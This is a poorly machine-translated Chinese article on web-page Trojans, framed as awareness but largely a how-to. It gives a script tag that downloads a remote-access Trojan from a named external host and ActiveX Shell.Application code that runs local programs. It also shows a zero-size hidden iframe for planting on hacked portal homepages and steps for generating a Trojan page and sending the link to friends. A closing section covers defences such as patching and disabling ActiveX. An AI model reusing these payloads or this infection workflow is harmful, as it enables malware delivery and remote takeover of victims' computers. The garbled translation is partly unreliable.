There are two sides to everything. This article introduces the Web Trojan production techniques, intended to strengthen the awareness of the prevention, rather than to "Shenring". Hope that we can bring some help to create a safe internet environment.
If you visit XX website (a domestic portal site), you will be in the gray pigeon Trojan. This is a hacker friend of mine said to me. Open the homepage of the website, after checking, I did get a gray pigeon. How to achieve it? He said he hacked into the site's servers and hung a Trojan horse on the homepage of the website; Some security experts often say, do not open a stranger's address, why? Because the site is likely to be some malicious people carefully crafted Web Trojan.
The above is only the two forms of the Web Trojan, in fact, the Web Trojan can also be hung in multimedia files (RM, RMVB, WMV, WMA, Flash), e-mail, forums and other documents and occasions. It's scary, so how do users guard against Web Trojans? Here we start from the Web Trojan attack principle.
First, the Web Trojan attack principle
First clear, the Web Trojan is actually an HTML page, unlike other pages is the Web page is carefully crafted by hackers, users once visited the page will be in the Trojan. Why is it that the hackers crafted it? Because the scripts embedded in this web page are appropriately exploiting the vulnerabilities of IE browsers, let IE in the background automatically download hackers placed on the network Trojan and run (install) This trojan, that is, this webpage can download Trojan to local and run (install) downloaded to the local computer Trojan, the entire process in the background run, Once the user opens the Web page, the download process and the run (installation) process start automatically.
Some friends will say, open a Web page, ie browser can really automatically download programs and run programs? If IE really can arbitrarily download and run the program, the world is not chaotic. In fact, in order to secure, ie browser is forbidden to automatically download programs, especially running programs, but, IE browser has some known and unknown vulnerabilities, the Web Trojan is to use these vulnerabilities to get permission to download programs and run programs. Below I give an earlier vulnerability of IE browser to explain these two problems separately.
⒈ Automatic Download program
<script language= "Icyfoxlovelace" src= "Http://go163go.vicp.net/1.exe" ></SCRIPT>
Tip: Code Description
A. The attribute of "src" in the code is the network address of the program, in this case "Http://go163go.vicp.net/1.exe" is the Gray Pigeon Server installation program that I placed on my website, which allows the Web page to download the program to browse its computer.
B. The trojan can also be uploaded to the free homepage space, but free space for security considerations, most of the upload EXE file, hackers may be modified to change the extension exe bat or COM, so they can upload these programs to the server.
Insert this code between the </BODY>...</BODY> of the source code of the Web page (Figure 1), then open it with a IE6, then open the temporary directory of IE <temporary Internet files> You will find that there is a "1.exe" file in the folder, which means that the page has automatically downloaded the gray pigeon Trojan that I placed on the Web server.
Figure 1 Example of a Web Trojan
RELATED links:
Non-toxic myth is broken: Mac OS x First Encounter Trojan
The new Trojan unexpectedly "kidnap" the user file request 300 dollars ransom
Let the Web Trojan go away | April 5 Gray Pigeon attack on a large scale
Small tip: Gray Pigeon Trojan
Why do you have to use the gray pigeon Trojan? Because the gray pigeon is a rebound trojan, the Trojan can bypass Skynet and other firewall interception, after the horse, the server is the end of the control can be actively connected to the console (client), that is, once the control-side connected to the Internet, in the control side where the controlled end will be "automatic on-line" (Figure 2).
Figure 2 Grey Pigeon control Short sample (Khan!) Another big drug kingpin:)
⒉ Automatic Running Program
<script language= "javascript" type= "Text/javascript" > var shell=new activexobject ("shell.application"); Shell.namespace ("C:\\windows\\"). Items (). Item ("Notepad.exe"). Invokeverb (); </SCRIPT>
Insert this code between the </BODY>...</BODY> of the source code of the Web page, and then open the page with IE, you will find that this code can automatically open Notepad in the IE6 without a related patch.
This code uses the Shell.Application control, which gives the Web page permission to execute, replacing the "Notepad.exe" (Notepad) program in the code that automatically runs any program on the local computer.
Through the above code we can see that the use of IE loopholes, that is, insert the appropriate code in the Web page, ie can automatically download and run the program, however, ie once the relevant patch, the code will lose its role. In addition, the code to run and download the program, some anti-virus software web monitoring will be regarded as viruses, in order to evade the pursuit, hackers may use some tools to the source code of the page to encrypt processing (Figure 3).
Figure 3 Encrypted Web page code
RELATED links:
Non-toxic myth is broken: Mac OS x First Encounter Trojan
The new Trojan unexpectedly "kidnap" the user file request 300 dollars ransom
Let the Web Trojan go away | April 5 Gray Pigeon attack on a large scale
Second, the basic use of web Trojans
Understand the principle of the Web Trojan attack, we can make their own web Trojan, but this requires you to write out the use of IE vulnerability Code. In fact, there are many experts on the Internet have written some loopholes in the use of code, and some also wrote it as a visual program. Search in the search engine by entering the "Web Trojan Generator" you will find that the Internet has a lot of use of IE's various vulnerabilities to write the Web Trojan generator, most of them for the visualization of the program, as long as you have a Trojan horse (the Trojan must put it on the network), using these generators you can immediately generate a Web page, The webpage is the webpage Trojan, as long as others open this webpage, the webpage can complete download Trojan and run (install) Trojan process automatically.
On my computer I have downloaded a Web Trojan generator, below we see how to create a Web Trojan and let others in the Trojan.
The first step: launch the Web Trojan generator, as shown in Figure 4, in the text box, enter the network address of the Trojan, and finally click "Build."
Figure 4 Web Trojan generator
The second step: in the Web page Trojan Generator installation folder will generate a Web page file, the file is the one we generated in the last step of the Trojan horse. Upload the file to your own Web server or free main surface space.
Now, put the above page on the server address (URL) through QQ to their friends, once he visited the webpage, the webpage will automatically download and run on his computer on the Trojan horse you placed on the network.
Now you should understand the safety expert's advice "Do not open the network address of the Stranger," the true meaning of this sentence! In fact, even if everyone does not open a stranger's address, there are still some people "moth to fill the lamp, suicide," because if the big Internet, there will always be some people would intentionally or unintentionally visit these URLs, and, some of the Web Trojan, also hung on some well-known sites (according to the number of visits to well-known sites, you calculate it , how many people each day the Trojan! )。
tips: You may not have thought, watching movies, in the Forum to view or reply to the Post can also Trojan. In fact, the Trojan can also be hung in multimedia files, e-mail, forums, CHM e-books, so that once the user watch the movie, view or preview the message (mainly some e-mail sent by the spam), participate in posts, open e-books, users will be in the Web Trojan.
Below we will only describe how the hacker on the well-known website to hang the webpage Trojan horse. Here's a snippet of code: IFRAME src= "http://go163go.vicp.net/hk.htm" width= "0" height= "0" frameborder= "0" ></iframe>
RELATED links:
Non-toxic myth is broken: Mac OS x First Encounter Trojan
The new Trojan unexpectedly "kidnap" the user file request 300 dollars ransom
Let the Web Trojan go away | April 5 Gray Pigeon attack on a large scale
small hint:"src" attribute "http://go163go.vicp.net/hk.htm" is uploaded to the server on the Web page Trojan Web site.
Insert this code into a portal site home source code </BODY>...</BODY> between, from the surface, the portal after inserting the home page and no changes, but, all visited the portal home page of the people will be in the Trojan, why this? This is because the <iframe> tag in this code hides the Web page of the Trojan page "contained" in the page where the code is inserted.
<iframe> is also called floating frame label, which can embed an HTML Web page into another Web page to implement the "painting" effect (Figure 5), the embedded Web page can control the width, height and the size of the border and scroll bar. In the previous code, because the width (width), high (height), border (frameborder) are set to "0", so, the above code inserted into the portal home page, the site will not change the homepage, but, because the embedded Web page is actually opened, So the download Trojan horse on the webpage and the script that runs the Trojan horse will still be executed with the opening of the homepage of the portal.
Figure 5 Example of an IFRAME tag
Some people may ask, how to insert the above code into the portal site home page source? This question is very good, I talents, really can not enter their server to modify the Web page, but if the hacker found the vulnerabilities on these servers and obtained Webshell permissions, then modify their Web page is as easy as the local production of a Web page.
Some people also ask, get the server Webshell permissions easy? If you are more concerned about network security, you will find that the site is often hacked, the homepage of that site has been modified news burst.
Some people also asked, the portal server almost no loopholes to find, personal server vulnerabilities more, you can enter? I am not a hacker, the law of the People's Republic of China, intrusion and tampering with other people's information on the server is illegal, I hope everyone together to maintain network security.
In the past, the Internet to open some famous website anti-virus software will also alarm, now you understand the truth of it. Some people in these websites post dozens, read this article, hope in dozens when you can also for those back to the webmaster think.
RELATED links:
Non-toxic myth is broken: Mac OS x First Encounter Trojan
The new Trojan unexpectedly "kidnap" the user file request 300 dollars ransom
Let the Web Trojan go away | April 5 Gray Pigeon attack on a large scale
Three: The prevention strategy of webpage Trojan
The prevention of the webpage Trojan is not enough only by anti-virus software and firewall. Because once the hacker used the bounce port of personal version of the Trojan (personal disassembly of some anti-virus software can not identify the Trojan), then antivirus software and firewalls will be helpless, so, the Web Trojan prevention from its principle to start, from the root of the prevention.
㈠ Immediate Installation Security patch
Web Trojan is the use of IE to spread the vulnerability, we take the ice Fox prodigal son of the Web Trojan (with "Ice Fox prodigal son Trojan Horse" made by the Web Trojan), the Web page can bypass the security settings of IE, when users connect to the page, It can download a Trojan horse and run (install) the Trojan in the background without the knowledge of ordinary users. Therefore, often to the Microsoft website to download and install the latest security patches is a more effective way to prevent the Web Trojan.
㈡ Rename or uninstall (reverse registration) The least secure ActiveXObject (ie plugin)
Some activexobject in the system run EXE programs, such as the shell.application controls in the "Autorun Program" code in this article, which, when executed in a Web page, becomes the "hotbed" of the Trojan. So renaming or uninstalling these controls can completely prevent web trojans that use these controls. But ActiveXObject is for application, not for attack, all controls have its use, so before renaming or uninstalling a control, you have to make sure that the control is not needed, or even uninstall it is not about the general.
⒈ Uninstall (anti-registration) ActiveXObject
The first step: On the Start menu, click Run, enter the CMD command to open a command prompt window.
Step two: Enter "Regsvr32.exe shell32.dll/u/s" at the command prompt, and then you can unload the Shell.Application control by entering the carriage.
If we want to continue using this control in the future, you can reinstall (register) by entering the "Regsvr32.exe shell32.dll/i/s" command in the command Prompt window. In the above command: "regsvr32.exe" is the command to register or reverse the OLE object or control, [/u] is the inverse registration parameter, [/s] is the silent mode parameter, [/I] is the installation parameter.
⒉ renamed ActiveXObject
What you need to note is that when you rename a control, the name of the control and the CLSID (Class ID) are changed, and the change is complete. Shell.Application is still used as an example to introduce the method below.
Step One: Open Registry Editor and look for "shell.application". You can find two registry entries in this way: ' {13709620-c279-11ce-a49e-444553540000} ' and ' shell.application '.
Step Two: Change {13709620-c279-11ce-a49e-444553540000} to {13709620-c279-11ce-a49e-444553540001}, and be careful not to repeat it with the other CLSID in the system.
The third step: "Shell.Application" renamed "Shell.application_xxx". When you use this control later, you can call this control properly using this name.
RELATED links:
Non-toxic myth is broken: Mac OS x First Encounter Trojan
The new Trojan unexpectedly "kidnap" the user file request 300 dollars ransom
Let the Web Trojan go away | April 5 Gray Pigeon attack on a large scale
㈢ increase the security level of IE, disable scripts and ActiveX controls
After the author's test, with the ice Fox prodigal son of the "Web Trojan Professional Edition" generated by the Web Trojan, as long as the security level to increase IE, or disable the script, the Web Trojan will not work. From the Trojan attack principle we can see that the Web Trojan is the use of IE scripts and ActiveX control on some of the vulnerabilities to download and run the Trojan, as long as we disable the script and ActiveX control, you can prevent Trojans download and run.
tip: Disabling scripts and ActiveX controls can disable the functionality and effects of some Web pages, so it's up to you to decide on your own security needs.
Step one: In the IE browser menu bar, select Tools →internet options to open the Internet Options dialog box.
Step two: On the Security tab, on the Internet and the local Internet zone, move the slider to the highest (Figure 6), or click Custom level to disable the script on the Open dialog box and disable the ActiveX control.